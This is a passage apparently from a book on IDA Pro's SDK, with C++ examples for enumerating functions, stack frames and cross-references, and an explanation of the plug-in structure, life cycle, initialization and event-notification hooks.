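const mock_ea_t MOCK_BADADDR = static_cast<mock_ea_t>(-1);

// A toy cross-reference store: each target address maps to the set of
// addresses that refer to it as data.
typedef std::map<mock_ea_t, std::set<mock_ea_t> > xref_table_t;

// Mimics the shape of get_first_dref_to: the smallest referrer of 'to',
// or MOCK_BADADDR when nothing refers to it.
mock_ea_t mock_first_dref_to(const xref_table_t &t, mock_ea_t to) {
    xref_table_t::const_iterator it = t.find(to);
    if (it == t.end() || it->second.empty()) return MOCK_BADADDR;
    return *it->second.begin();
}

// Mimics the shape of get_next_dref_to: the smallest referrer greater
// than 'current', which must come from an earlier first/next call.
mock_ea_t mock_next_dref_to(const xref_table_t &t, mock_ea_t to,
                            mock_ea_t current) {
    assert(current != MOCK_BADADDR);
    xref_table_t::const_iterator it = t.find(to);
    if (it == t.end()) return MOCK_BADADDR;
    std::set<mock_ea_t>::const_iterator next = it->second.upper_bound(current);
    return next == it->second.end() ? MOCK_BADADDR : *next;
}

// The first/next loop: collect every referrer until the sentinel appears.
std::vector<mock_ea_t> collect_drefs_to(const xref_table_t &t, mock_ea_t to) {
    std::vector<mock_ea_t> out;
    for (mock_ea_t ea = mock_first_dref_to(t, to); ea != MOCK_BADADDR;
         ea = mock_next_dref_to(t, to, ea)) {
        out.push_back(ea);
    }
    return out;
}
```

The loop in collect_drefs_to has the same shape that a real plug-in would use with the SDK functions: seed with the "first" call, feed each result back into the "next" call, and stop at the sentinel.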

Iteration Techniques Using the IDA API

Using the IDA API, there are often several different ways to iterate over

various database objects. In the following examples we demonstrate some

common iteration techniques:

Enumerating Functions

The first technique for iterating through the functions within a database

mimics the manner in which we performed the same task using IDC:

for (func_t *f = get_next_func(0); f != NULL; f = get_next_func(f->startEA)) {

char fname[1024];

get_func_name(f->startEA, fname, sizeof(fname));

msg("%08x: %s\n", f->startEA, fname);

}

Alternatively, we can simply iterate through functions by index numbers,

as shown in the next example:

for (int idx = 0; idx < get_func_qty(); idx++) {

char fname[1024];

func_t *f = getn_func(idx);

get_func_name(f->startEA, fname, sizeof(fname));

msg("%08x: %s\n", f->startEA, fname);

}

Finally, we can work at a somewhat lower level and make use of a data

structure called an areacb_t, also known as an area control block, defined in

area.hpp. Area control blocks are used to maintain lists of related area_t

objects. A global areacb_t named funcs is exported (in funcs.hpp) as part of

the IDA API. Using the areacb_t class, the previous example can be rewritten

as follows:

int a = funcs.get_next_area(0);                // (1)
while (a != -1) {
   char fname[1024];
   func_t *f = (func_t*)funcs.getn_area(a);    // (3) getn_area returns an area_t
   get_func_name(f->startEA, fname, sizeof(fname));
   msg("%08x: %s\n", f->startEA, fname);
   a = funcs.get_next_area(f->startEA);        // (2)
}

In this example, the get_next_area member function, (1) and (2), is used repeatedly to obtain the index values for each area in the funcs control block. A pointer to each related func_t area is obtained by supplying each index value to the getn_area member function (3). Several global areacb_t variables are declared within the SDK, including the segs global, which is an area control block containing segment_t pointers for each section in the binary.

Enumerating Structure Members

Within the SDK, stack frames are modeled using the capabilities of the struc_t

class. The example in Listing 16-6 utilizes structure member iteration as a

means of printing the contents of a stack frame.

func_t *func = get_func(get_screen_ea()); //get function at cursor location
msg("Local variable size is %d\n", func->frsize);
msg("Saved regs size is %d\n", func->frregs);
struc_t *frame = get_frame(func); //get pointer to stack frame
if (frame) {
   size_t ret_addr = func->frsize + func->frregs; //offset to return address
   for (size_t m = 0; m < frame->memqty; m++) { //loop through members
      char fname[1024];
      get_member_name(frame->members[m].id, fname, sizeof(fname));
      if (frame->members[m].soff < func->frsize) {
         msg("Local variable ");
      }
      else if (frame->members[m].soff > ret_addr) {
         msg("Parameter ");
      }
      msg("%s is at frame offset %x\n", fname, frame->members[m].soff);
      if (frame->members[m].soff == ret_addr) {
         msg("%s is the saved return address\n", fname);
      }
   }
}

Listing 16-6: Enumerating stack frame members

This example summarizes a function’s stack frame using information

from the function’s func_t object and the associated struc_t representing the

function’s stack frame. The frsize and frregs fields specify the size of the

local variable portion of the stack frame and the number of bytes dedicated

to saved registers, respectively. The saved return address can be found within

the frame following the local variables and the saved registers. Within the

frame itself, the memqty field specifies the number of defined members con-

tained in the frame structure, which also corresponds to the size of the members

array. A loop is used to retrieve the name of each member and determine

whether the member is a local variable or an argument based on its starting

offset (soff) within the frame structure.
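The offset arithmetic behind that classification can be isolated in a few lines. This is a minimal sketch that uses plain integers in place of the func_t and struc_t fields; classify_frame_member is a hypothetical helper written for illustration and, unlike Listing 16-6, it also labels the saved-register region explicitly.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical helper: classify a frame member by its starting offset,
// assuming the layout described above (local variables first, then saved
// registers, then the saved return address, then arguments).
std::string classify_frame_member(std::size_t soff, std::size_t frsize,
                                  std::size_t frregs) {
    const std::size_t ret_addr = frsize + frregs; // offset of return address
    if (soff < frsize)    return "local variable";
    if (soff < ret_addr)  return "saved register";
    if (soff == ret_addr) return "return address";
    return "parameter";
}
```

For a frame with 0x20 bytes of locals and 4 bytes of saved registers, offset 0x24 is the saved return address and anything above it is treated as an argument.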

Enumerating Cross-References

In Chapter 15 we saw that it is possible to enumerate cross-references from

IDC scripts. The same capabilities exist within the SDK, though in a some-

what different form. As an example, let’s revisit the idea of listing all calls of

a particular function (see Listing 15-4 on page 274). The following function

almost works.

void list_callers(char *bad_func) {
   char name_buf[MAXNAMELEN];
   ea_t func = get_name_ea(BADADDR, bad_func);
   if (func == BADADDR) {
      warning("Sorry, %s not found in database", bad_func);
   }
   else {
      for (ea_t addr = get_first_cref_to(func); addr != BADADDR;
           addr = get_next_cref_to(func, addr)) {
         char *name = get_func_name(addr, name_buf, sizeof(name_buf));
         if (name) {
            msg("%s is called from 0x%x in %s\n", bad_func, addr, name);
         }
         else {
            msg("%s is called from 0x%x\n", bad_func, addr);
         }
      }
   }
}

The reason this function almost works is that there is no way to deter-

mine the type of cross-reference returned for each iteration of the loop

(recall that there is no SDK equivalent for IDC’s XrefType). In this case we

should verify that each cross-reference to the given function is in fact a call

type (fl_CN or fl_CF) cross-reference.

When you need to determine the type of a cross-reference within the

SDK, you must use an alternative form of cross-reference iteration facilitated

by the xrefblk_t structure, which is described in xref.hpp. The basic layout

of an xrefblk_t is shown in the following listing. (For full details, please see

xref.hpp.)

struct xrefblk_t {
   ea_t from;     // the referencing address - filled by first_to(),next_to()
   ea_t to;       // the referenced address - filled by first_from(), next_from()
   uchar iscode;  // 1-is code reference; 0-is data reference
   uchar type;    // type of the last returned reference
   uchar user;    // 1-is user defined xref, 0-defined by ida

   //fill the "to" field with the first address to which "from" refers.
   bool first_from(ea_t from, int flags);   // (1)

   //fill the "to" field with the next address to which "from" refers.
   //This function assumes a previous call to first_from.
   bool next_from(void);                    // (3)

   //fill the "from" field with the first address that refers to "to".
   bool first_to(ea_t to,int flags);        // (2)

   //fill the "from" field with the next address that refers to "to".
   //This function assumes a previous call to first_to.
   bool next_to(void);                      // (4)
};

The member functions of xrefblk_t are used to initialize the structure, (1)

and (2), and perform the iteration, (3) and (4), while the data members are used

to access information about the last cross-reference that was retrieved. The

flags value required by the first_from and first_to functions dictates which

type of cross-references should be returned. Legal values for the flags

parameter include the following (from xref.hpp):

#define XREF_ALL 0x00 // return all references

#define XREF_FAR 0x01 // don't return ordinary flow xrefs

#define XREF_DATA 0x02 // return data references only

Note that no flag value restricts the returned references to code only.

If you are interested in code cross-references, you must either compare the

xrefblk_t type field to specific cross-reference types (such as fl_JN) or test the

iscode field to determine if the last returned cross-reference was a code cross-

reference.

The following modified version of the list_callers function demonstrates

the use of an xrefblk_t iteration structure.

void list_callers(char *bad_func) {
   char name_buf[MAXNAMELEN];
   ea_t func = get_name_ea(BADADDR, bad_func);
   if (func == BADADDR) {
      warning("Sorry, %s not found in database", bad_func);
   }
   else {
      xrefblk_t xr;
      for (bool ok = xr.first_to(func, XREF_ALL); ok; ok = xr.next_to()) {
         if (xr.type != fl_CN && xr.type != fl_CF) continue;   // (1)
         char *name = get_func_name(xr.from, name_buf, sizeof(name_buf));
         if (name) {
            msg("%s is called from 0x%x in %s\n", bad_func, xr.from, name);
         }
         else {
            msg("%s is called from 0x%x\n", bad_func, xr.from);
         }
      }
   }
}

Through the use of an xrefblk_t, we now have the opportunity to

examine (1) the type of each cross-reference returned by the iterator and

decide whether it is interesting to us or not. In this example we simply ignore

any cross-reference that is not related to a function call. We did not use the

iscode member of xrefblk_t because iscode is true for jump and ordinary flow

cross-references in addition to call cross-references. Thus, iscode alone does

not guarantee that the current cross-reference is related to a function call.
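The difference between testing the type field and testing iscode can be seen with a small stand-alone model. Everything named mock_ or MOCK_ below is a hypothetical stand-in created for this sketch; in particular, the enumerator values are illustrative and are not claimed to match those in xref.hpp.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical stand-ins for the code cross-reference types.
enum mock_cref_t { MOCK_FL_CF, MOCK_FL_CN, MOCK_FL_JF, MOCK_FL_JN, MOCK_FL_F };

struct mock_xref_t {
    std::uint64_t from;   // referencing address
    mock_cref_t   type;   // kind of code cross-reference
    bool          iscode; // true for every code cross-reference
};

// Keep only the referencing addresses of call-type cross-references.
std::vector<std::uint64_t> call_sites(const std::vector<mock_xref_t> &xrefs) {
    std::vector<std::uint64_t> out;
    for (std::size_t i = 0; i < xrefs.size(); i++) {
        const mock_xref_t &xr = xrefs[i];
        if (xr.type != MOCK_FL_CN && xr.type != MOCK_FL_CF) continue;
        out.push_back(xr.from);
    }
    return out;
}

// Count the entries that a test of iscode alone would have accepted.
std::size_t code_xref_count(const std::vector<mock_xref_t> &xrefs) {
    std::size_t n = 0;
    for (std::size_t i = 0; i < xrefs.size(); i++) {
        if (xrefs[i].iscode) n++;
    }
    return n;
}
```

Given one near call, one far call, one jump, and one ordinary flow reference, call_sites returns two addresses while code_xref_count reports four, which is why the listing above filters on type.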

Summary

The functions and data structures described in this chapter only scratch the

surface of IDA’s API. For each of the functional categories described, many

more API functions exist that perform more specialized tasks and that provide

much finer control over various database elements than can be implemented

using IDC. In the following chapters we will cover the details of building plug-

in modules, loader modules, and processor modules, and we will continue to

expand our presentation of the capabilities of the SDK.

THE IDA PLUG-IN

ARCHITECTURE

Over the course of the next few chapters,

we will cover the types of modules that can

be constructed using the IDA SDK. We will also

discuss new features (since IDA 5.7) that allow for the

development of these same types of modules using one

of IDA’s scripting languages. Whether you ever intend

to create your own plug-ins or not, a basic understanding of plug-ins will

greatly enhance your experience using IDA, since, arguably, the majority of

third-party software developed for use with IDA is distributed in the form of

plug-ins. In this chapter, we begin the exploration of IDA modules by discuss-

ing the purpose of IDA plug-ins, along with how to build, install, and config-

ure them.

Plug-ins are probably best described as the compiled, albeit more power-

ful, equivalents of IDA scripts. Plug-ins are usually associated with a hotkey

and/or a menu item and are typically accessible only after a database has been

opened. Individual plug-ins may be general purpose in nature and useful

across a wide variety of binary file types and processor architectures, or they

may be very specialized, designed to be used only with a specific file format

or processor type. In all cases, by virtue of being compiled modules, plug-ins

have full access to the IDA API and can generally perform much more com-

plex tasks than you could ever hope to accomplish using scripting alone.

Writing a Plug-in

All IDA modules, including plug-ins, are implemented as shared library com-

ponents appropriate to the platform on which the plug-in is expected to exe-

cute. Under IDA’s modular architecture, modules are not required to export

any functions. Instead, each module type must export a variable of a specific

class. In the case of plug-ins, this class is called a plugin_t and is defined in the

SDK’s loader.hpp file.

In order to understand how to create a plug-in, you must first understand

the plugin_t class and its component data fields (the class has no member

functions). The layout of the plugin_t class is shown here, with comments

taken from loader.hpp:

class plugin_t {

public:

int version; // Should be equal to IDP_INTERFACE_VERSION

int flags; // Features of the plugin

int (idaapi* init)(void); // Initialize plugin

void (idaapi* term)(void); // Terminate plugin. This function will be called

// when the plugin is unloaded. May be NULL.

void (idaapi* run)(int arg); // Invoke plugin

char *comment; // Long comment about the plugin

char *help; // Multiline help about the plugin

char *wanted_name; // The preferred short name of the plugin

char *wanted_hotkey; // The preferred hotkey to run the plugin

};

THE EVOLVING IDA API

Since SDK 4.9, Hex-Rays has attempted to minimize changes to existing API functions between releases of IDA. One result of this policy is that binary plug-ins from an older version of IDA can often be copied directly into newer IDA installations and continue to work properly. Nonetheless, IDA’s API has grown with each new release, introducing new functions and new options to take advantage of IDA’s ever-expanding list of capabilities. As the SDK has evolved, Hex-Rays has opted to deprecate the occasional API function. When a function (or any other symbol) is deprecated, Hex-Rays moves it into a code block bounded by a test of the NO_OBSOLETE_FUNCS macro. If you wish to ensure that your plug-ins (or other modules) are not using any deprecated functions, you should define NO_OBSOLETE_FUNCS prior to including any SDK header files.

Every plug-in must export a plugin_t object named PLUGIN. Exporting your PLUGIN object is handled by loader.hpp, which leaves you responsible for declaring and initializing the actual object. Since successful plug-in creation relies on properly initializing this object, we describe the purpose of each member here. Note that even if you prefer to take advantage of IDA’s new scripted plug-in capabilities, you will still need to familiarize yourself with each of these fields because they are used in scripted plug-ins as well.

version

This member indicates the version number of the API that was used to

build the plug-in. It is typically set to the constant IDP_INTERFACE_VERSION,

which is declared in idp.hpp. The value of this constant has not changed

since the API was standardized with SDK version 4.9. The original intent

of this field was to prevent plug-ins created with earlier versions of an

SDK from being loaded into versions of IDA built with newer versions of

the SDK.

flags

This field contains various flags indicating how IDA should treat the plug-

in in various situations. The flags are set using a bitwise combination of

the PLUGIN_XXX constants defined in loader.hpp. For many plug-ins, assign-

ing zero to this field will be sufficient. Please refer to loader.hpp for the

meanings of each flag bit.

init

This is the first of three function pointers contained in the plugin_t

class. This particular member is a pointer to the plug-in’s initialization

function. The function takes no parameters and returns an int. IDA calls

this function to offer your plug-in a chance to be loaded. Initialization of

plug-ins is discussed in “Plug-in Initialization” on page 320.

term

This member is another function pointer. IDA calls the associated function

when your plug-in is unloaded. The function takes no arguments

and returns no value. The purpose of this function is to perform any

cleanup tasks (deallocating memory, closing handles, saving state, and

so on) required by your plug-in before IDA unloads it. This field may

be set to NULL if you have no actions to perform when your plug-in is

unloaded.

run

This member points to the function that should be called whenever a

user activates (via a hotkey, menu item, or script invocation) your plug-

in. This function is the heart of any plug-in, because it is here that the

behaviors users associate with the plug-in are defined. This is the func-

tion that bears the most resemblance to scripted behaviors. The function

receives a single integer parameter (discussed later under “Plug-in Exe-

cution” on page 322) and returns nothing.

comment

This member is a pointer to a character string that serves as a comment

for the plug-in. It is not used directly by IDA and can safely be set to

NULL.

help

This member is a pointer to a character string that serves as a multiline

help string. It is not used directly by IDA and can safely be set to NULL.

wanted_name

This member is a pointer to a character string that holds the name of the

plug-in. When a plug-in is loaded, this string is added to the Edit ▸ Plugins

menu as a means of activating the plug-in. There is no requirement for

the name to be unique among loaded plug-ins, though it is difficult to

determine which of two identically named plug-ins will be activated

when the name is selected from the menu.

wanted_hotkey

This member is a pointer to a character string that holds the name of the

hotkey (such as "Alt-F8") that IDA will attempt to associate with the plug-

in. Here again, there is no need for this value to be unique among loaded

plug-ins; however, if the value is not unique, the hotkey will be associated

with the last plug-in to request it. “Configuring Plug-ins” on page 330 dis-

cusses how users may override the wanted_hotkey value.

An example of initializing a plugin_t object is shown here:

int idaapi idabook_plugin_init(void);
void idaapi idabook_plugin_term(void);
void idaapi idabook_plugin_run(int arg);

char idabook_comment[] = "This is an example of a plugin";
char idabook_name[] = "Idabook";
char idabook_hotkey[] = "Alt-F9";

plugin_t PLUGIN = {
   IDP_INTERFACE_VERSION, 0, idabook_plugin_init, idabook_plugin_term,
   idabook_plugin_run, idabook_comment, NULL, idabook_name, idabook_hotkey
};

The function pointers included in the plugin_t class allow IDA to locate

required functions in your plug-in without requiring you to export those

functions or to choose specific names for those functions.
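To see why a single exported descriptor is sufficient, consider the following toy model of a host and a plug-in. It is a sketch only: mock_plugin_t is a simplified, hypothetical stand-in for plugin_t, mock_host_session is not how IDA itself is implemented, and the nonzero/zero return convention used for init here is an assumption of the model.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// Hypothetical, simplified stand-in for plugin_t: data fields only.
struct mock_plugin_t {
    int  (*init)(void);      // decide whether to load
    void (*term)(void);      // optional cleanup, may be NULL
    void (*run)(int arg);    // perform the plug-in's work
    const char *wanted_name; // menu name
};

static std::vector<std::string> g_trace; // records the order of calls

// The function names are private to the plug-in; the host never sees them.
static int  demo_init(void)   { g_trace.push_back("init"); return 1; }
static void demo_term(void)   { g_trace.push_back("term"); }
static void demo_run(int arg) { g_trace.push_back(arg == 0 ? "run(0)" : "run(n)"); }

// The only symbol a host would need to look up.
mock_plugin_t MOCK_PLUGIN = { demo_init, demo_term, demo_run, "Demo" };

// A toy host: it reaches every function through the descriptor.
void mock_host_session(const mock_plugin_t &p, int activations) {
    assert(p.init != NULL && p.run != NULL);
    if (p.init() == 0) return;             // plug-in declined to load
    for (int i = 0; i < activations; i++) p.run(0);
    if (p.term != NULL) p.term();          // term is optional
}
```

Calling mock_host_session(MOCK_PLUGIN, 2) leaves the sequence init, run(0), run(0), term in g_trace, even though none of the three functions is visible outside the plug-in's source file.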

The Plug-in Life Cycle

A typical IDA session begins with the launch of the IDA application itself and

proceeds through loading and analyzing a new binary file or existing data-

base before settling down to wait for user interaction. During this process,

there are three distinct points at which IDA offers plug-ins a chance to load:

1. A plug-in may load immediately upon IDA startup, regardless of whether

a database is being loaded or not. Loading in this manner is controlled

by the presence of the PLUGIN_FIX bit in PLUGIN.flags.

2. A plug-in may load immediately following a processor module and

remain loaded until the processor module is unloaded. Tying a plug-in

to a processor module is controlled by the PLUGIN_PROC bit in PLUGIN.flags.

3. In the absence of the flag bits just mentioned, IDA offers plug-ins the

opportunity to load each time a database is opened in IDA.

IDA offers plug-ins the opportunity to load by calling PLUGIN.init. When

called, the init function should determine whether the plug-in is designed

to be loaded given the current state of IDA. The meaning of current state varies

depending on which of the three preceding situations is applicable when

the plug-in is being loaded. Examples of states that a plug-in may be interested

in include the input file type (a plug-in may be designed specifically for use

with PE files, for example) and the processor type (a plug-in may be designed

exclusively for use with x86 binaries).

To indicate its desires to IDA, PLUGIN.init must return one of the follow-

ing values defined in loader.hpp.

PLUGIN_SKIP Returning this value signals that the plug-in should not

be loaded.

PLUGIN_OK Returning this value instructs IDA to make the plug-in

available for use with the current database. IDA loads the plug-in when

the user activates the plug-in using a menu action or a hotkey.

PLUGIN_KEEP Returning this value instructs IDA to make the plug-in

available for use with the current database and keep the plug-in loaded

in memory.

Once a plug-in has been loaded, it may be activated in one of two ways.

The most frequent method of activating a plug-in is at the direction of the

user in response to a menu selection or hotkey activation. Each time a plug-in

is activated in this way, IDA passes control to the plug-in by calling PLUGIN.run.

An alternate method for plug-in activation is for the plug-in to hook into

IDA’s event-notification system. In such cases, a plug-in must express interest

in one or more types of IDA events and register a callback function to be

called by IDA when any event of interest occurs.

When it is time for a plug-in to be unloaded, IDA calls PLUGIN.term

(assuming it is non-NULL). The circumstances under which a plug-in is

unloaded vary according to the bits set in PLUGIN.flags. Plug-ins that specify

no flag bits are loaded according to the value returned by PLUGIN.init. These

types of plug-ins are unloaded when the database for which they were loaded

is closed.

When a plug-in specifies the PLUGIN_UNL flag bit, the plug-in is unloaded

after each call to PLUGIN.run. Such plug-ins must be reloaded (resulting in a

call to PLUGIN.init) for each subsequent activation. Plug-ins that specify the

PLUGIN_PROC flag bit are unloaded when the processor module for which they

were loaded is unloaded. Processor modules are unloaded whenever a data-

base is closed. Finally, plug-ins that specify the PLUGIN_FIX flag bit are unloaded

only when IDA itself terminates.
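The unloading rules just described can be condensed into a single decision function. This is a rough sketch: the MOCK_ names echo the constants in loader.hpp, but their values are invented for the example, and the order in which combined flag bits are tested is our own assumption rather than documented IDA behavior.

```cpp
#include <cassert>
#include <string>

// Illustrative flag bits and init results (values are assumptions).
enum { MOCK_PLUGIN_UNL = 0x1, MOCK_PLUGIN_PROC = 0x2, MOCK_PLUGIN_FIX = 0x4 };
enum { MOCK_SKIP = 0, MOCK_OK = 1, MOCK_KEEP = 2 };

// Describe when a plug-in with the given flags and init result would be
// unloaded, following the rules in the text.
std::string unload_point(int flags, int init_result) {
    if (init_result == MOCK_SKIP) return "never loaded";
    if (flags & MOCK_PLUGIN_UNL)  return "after each run";
    if (flags & MOCK_PLUGIN_FIX)  return "IDA exit";
    if (flags & MOCK_PLUGIN_PROC) return "processor module unload";
    return "database close";
}
```

A plug-in that sets no flag bits and returns the equivalent of PLUGIN_KEEP falls through to "database close", which matches the default case described above.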

Plug-in Initialization

Plug-ins are initialized in two phases. Static initialization of plug-ins takes

place at compile time, while dynamic initialization takes place at load time

via actions performed within PLUGIN.init. As discussed earlier, the PLUGIN.flags

field, which is initialized at compile time, dictates several behaviors of a

plug-in.

When IDA is launched, the PLUGIN.flags field of every plug-in in <IDADIR>/

plugins is examined. At this point, IDA calls PLUGIN.init for each plug-in that

specifies the PLUGIN_FIX flag. PLUGIN_FIX plug-ins are loaded before any other

IDA module and therefore have the opportunity to be notified of any event

that IDA is capable of generating, including notifications generated by loader

modules and processor modules. The PLUGIN.init function for such plug-ins

should generally return either PLUGIN_OK or PLUGIN_KEEP, because it makes

little sense to request it to be loaded at startup only to return PLUGIN_SKIP in

PLUGIN.init.

However, if your plug-in is designed to perform a one-time initialization

task at IDA startup, you may consider performing that task in the plug-in’s

init function and returning PLUGIN_SKIP to indicate that the plug-in is no

longer needed.

Each time a processor module is loaded, IDA samples the PLUGIN_PROC

flag in every available plug-in and calls PLUGIN.init for each plug-in in which

PLUGIN_PROC is set. The PLUGIN_PROC flag allows plug-ins to be created that

respond to notifications generated by processor modules and thereby sup-

plement the behavior of those modules. The PLUGIN.init function for such

modules has access to the global processor_t object, ph, which may be examined

and used to determine whether the plug-in should be skipped or retained. For

example, a plug-in designed specifically for use with the MIPS processor mod-

ule should probably return PLUGIN_SKIP if the x86 processor module is being

loaded, as shown here:

int idaapi mips_init() {

if (ph.id != PLFM_MIPS) return PLUGIN_SKIP;

else return PLUGIN_OK; //or, alternatively PLUGIN_KEEP

}

Finally, each time a database is loaded or created, the PLUGIN.init func-

tion for each plug-in that has not already been loaded is called to determine

whether the plug-in should be loaded or not. At this point each plug-in may

use any number of criteria to determine whether IDA should retain it or not.

Examples of specialized plug-ins include those that offer behavior specific to

certain file types (ELF, PE, Mach-O, etc.), processor types, or compiler types.

Regardless of the reason, when a plug-in decides to return PLUGIN_OK (or

PLUGIN_KEEP), the PLUGIN.init function should also take care of any one-time

initialization actions necessary to ensure that the plug-in is capable of perform-

ing properly when it is eventually activated. Any resources that are requested

by PLUGIN.init should be released in PLUGIN.term. A major difference between

PLUGIN_OK and PLUGIN_KEEP is that PLUGIN_KEEP prevents a plug-in from being

repeatedly loaded and unloaded and thus reduces the need to allocate,

deallocate, and reallocate resources as might be required when a plug-in

specifies PLUGIN_OK. As a general rule of thumb, PLUGIN.init should return

PLUGIN_KEEP when future invocations of the plug-in may depend on states

accumulated during previous invocations of the plug-in. A workaround for

this is for plug-ins to store any state information in the open IDA database

using a persistent storage mechanism such as netnodes. Using such a tech-

nique, subsequent invocations of the plug-in can locate and utilize data

stored by earlier invocations of the plug-in. This method has the advantage

of providing persistent storage not only across invocations of the plug-in but

also across IDA sessions.

For plug-ins in which each invocation is completely independent of any

previous invocations, it is often suitable for PLUGIN.init to return PLUGIN_OK,

which has the advantage of reducing IDA’s memory footprint by keeping

fewer modules loaded in memory at any given time.
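The trade-off between the two return values can be modeled without IDA. In the sketch below, mock_store_t is a hypothetical stand-in for a persistent store such as a netnode (it is not the netnode API), and the "reload on every activation" branch models the worst case for a plug-in that is not kept in memory.

```cpp
#include <cassert>
#include <map>
#include <string>

// Stand-in for persistent storage that outlives any one loaded instance.
typedef std::map<std::string, int> mock_store_t;

// One loaded instance of a plug-in. Its member state vanishes on unload.
class mock_instance_t {
public:
    explicit mock_instance_t(mock_store_t &store)
        : runs_in_memory(0), store_(store) {}
    void run() {
        runs_in_memory++;        // lost when the instance is destroyed
        store_["run_count"]++;   // survives in the external store
    }
    int runs_in_memory;
private:
    mock_store_t &store_;
};

// Activate a plug-in n times and report the in-memory counter seen by the
// last activation. With keep_loaded the same instance is reused; otherwise
// a fresh instance is created (loaded) for every activation.
int in_memory_count_after(int n, bool keep_loaded, mock_store_t &store) {
    assert(n > 0);
    int last = 0;
    if (keep_loaded) {
        mock_instance_t inst(store);
        for (int i = 0; i < n; i++) { inst.run(); last = inst.runs_in_memory; }
    } else {
        for (int i = 0; i < n; i++) {
            mock_instance_t inst(store);  // load
            inst.run();
            last = inst.runs_in_memory;   // unloaded at end of scope
        }
    }
    return last;
}
```

After three activations the kept instance has counted to 3 while the reloaded one never gets past 1, yet the external store reads 3 in both cases. That is the behavior the netnode workaround relies on.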

Event Notification

While plug-ins are quite frequently activated directly by a user via a menu

selection (EditPlugins) or through the use of a hotkey, IDA’s event-

notification capabilities offer an alternative means of activating plug-ins.

When you want your plug-ins to be notified of specific events that take

place within IDA, you must register a callback function to express interest in

specific event types. The hook_to_notification_point function is used to inform

IDA (1) that you are interested in a particular class of events and (2) that IDA

should call the function that you indicate each time an event in the indicated

class occurs. An example of using hook_to_notification_point to register inter-

est in database events is shown here:

//typedef for event hooking callback functions (from loader.hpp)

typedef int idaapi hook_cb_t(void *user_data, int notification_code, va_list va);

//prototype for hook_to_notification_point (from loader.hpp)

bool hook_to_notification_point(hook_type_t hook_type,

hook_cb_t *callback,

void *user_data);

int idaapi idabook_plugin_init() {
   //Example call to hook_to_notification_point
   hook_to_notification_point(HT_IDB, idabook_database_cb, NULL);
   return PLUGIN_KEEP; //remain loaded so that the callback stays valid
}

Four broad categories of notification exist: processor notifications

(idp_notify in idp.hpp, HT_IDP), user interface notifications (ui_notification_t

in kernwin.hpp, HT_UI), debugger events (dbg_notification_t in dbg.hpp, HT_DBG),

and database events (idb_event::event_code_t in idp.hpp, HT_IDB). Within each event category

are a number of individual notification codes that represent specific events for

which you will receive notifications. Examples of database (HT_IDB) notifica-

tions include idb_event::byte_patched, to indicate that a database byte has been

patched, and idb_event::cmt_changed, to indicate that a regular or repeatable

comment has been changed. Each time an event occurs, IDA invokes each

registered callback function, passing the specific event-notification code and

any additional parameters specific to the notification code. Parameters sup-

plied for each notification code are detailed in the SDK header files that

define each notification code.

Continuing the preceding example, we might define a callback function

to handle database events as follows:

int idaapi idabook_database_cb(void *user_data, int notification_code, va_list va) {
   ea_t addr;
   ulong original, current;
   switch (notification_code) {
      case idb_event::byte_patched:
         addr = va_arg(va, ea_t);   // (1)
         current = get_byte(addr);
         original = get_original_byte(addr);
         msg("%x was patched to %x. Original value was %x\n",
             addr, current, original);
         break;
   }
   return 0;
}

This particular example recognizes only the byte_patched notification message, for which it prints the address of the patched byte, the new value of the byte, and the original value of the byte. Notification callback functions make use of the C++ variable arguments list, va_list, to provide access to a variable number of arguments, depending on which notification code is being sent to the function. The number and type of arguments provided for each notification code are specified in the header files in which each notification code is defined. The byte_patched notification code is defined in idp.hpp to receive one argument of type ea_t in its va_list. The C++ va_arg macro should be used to retrieve successive arguments from a va_list. The address of the patched byte is retrieved from the va_list at (1) in the preceding example.

An example of unhooking from database notification events is shown here:

void idaapi idabook_plugin_term() {

unhook_from_notification_point(HT_IDB, idabook_database_cb, NULL);

}

All well-behaved plug-ins should unhook any notifications whenever the

plug-in is unloaded. This is one of the intended purposes of the PLUGIN.term

function. Failure to unhook all of your active notifications will almost cer-

tainly result in crashing IDA shortly after your plug-in is unloaded.
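The complete hook, notify, and unhook cycle, including the va_list handoff, can be exercised in a stand-alone program. The following is a minimal sketch in standard C++; every mock_ and MOCK_ name is a hypothetical stand-in for the corresponding SDK facility, and the toy registry makes no claim about how IDA stores its hooks.

```cpp
#include <cassert>
#include <cstdarg>
#include <cstddef>
#include <cstdint>
#include <vector>

typedef std::uint64_t mock_ea_t;                       // stand-in for ea_t
enum { MOCK_BYTE_PATCHED = 1, MOCK_CMT_CHANGED = 2 };  // illustrative codes

// Same shape as the callback typedef shown earlier, minus the idaapi macro.
typedef int mock_hook_cb_t(void *user_data, int code, va_list va);

struct mock_hook_t { mock_hook_cb_t *cb; void *user_data; };
static std::vector<mock_hook_t> g_hooks;               // toy hook registry

bool mock_hook(mock_hook_cb_t *cb, void *ud) {
    mock_hook_t h = { cb, ud };
    g_hooks.push_back(h);
    return true;
}

bool mock_unhook(mock_hook_cb_t *cb, void *ud) {
    for (std::size_t i = 0; i < g_hooks.size(); i++) {
        if (g_hooks[i].cb == cb && g_hooks[i].user_data == ud) {
            g_hooks.erase(g_hooks.begin() + i);
            return true;
        }
    }
    return false;
}

// Host side: package the event arguments and call every registered hook.
void mock_notify(int code, ...) {
    for (std::size_t i = 0; i < g_hooks.size(); i++) {
        va_list va;
        va_start(va, code);   // fresh argument list for each callback
        g_hooks[i].cb(g_hooks[i].user_data, code, va);
        va_end(va);
    }
}

// Plug-in side: pull only the arguments that this code is defined to carry.
int patch_logger(void *user_data, int code, va_list va) {
    std::vector<mock_ea_t> *log =
        static_cast<std::vector<mock_ea_t> *>(user_data);
    assert(log != NULL);
    if (code == MOCK_BYTE_PATCHED) {
        mock_ea_t addr = va_arg(va, mock_ea_t);
        log->push_back(addr);
    }
    return 0;
}
```

Once mock_unhook has removed patch_logger, later calls to mock_notify no longer reach it. In this model a forgotten hook is harmless; in IDA the callback's code may already have been unloaded, which is why unhooking in PLUGIN.term matters.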

Plug-in Execution

Thus far we have discussed several instances in which IDA calls functions

belonging to a plug-in. Plug-in loading and unloading operations result in

calls to PLUGIN.init and PLUGIN.term, respectively. User plug-in activation via

the EditPlugins menu or the plug-in’s associated hotkey results in a call to

PLUGIN.run. Finally, callback functions registered by a plug-in may be called in

response to various events that take place within IDA.

Regardless of how a plug-in comes to be executed, it is important to

understand a few essential facts. Plug-in functions are invoked from IDA’s

main event-processing loop. While a plug-in is executing, IDA cannot process

events, including queued analysis tasks or updates to the user interface. There-

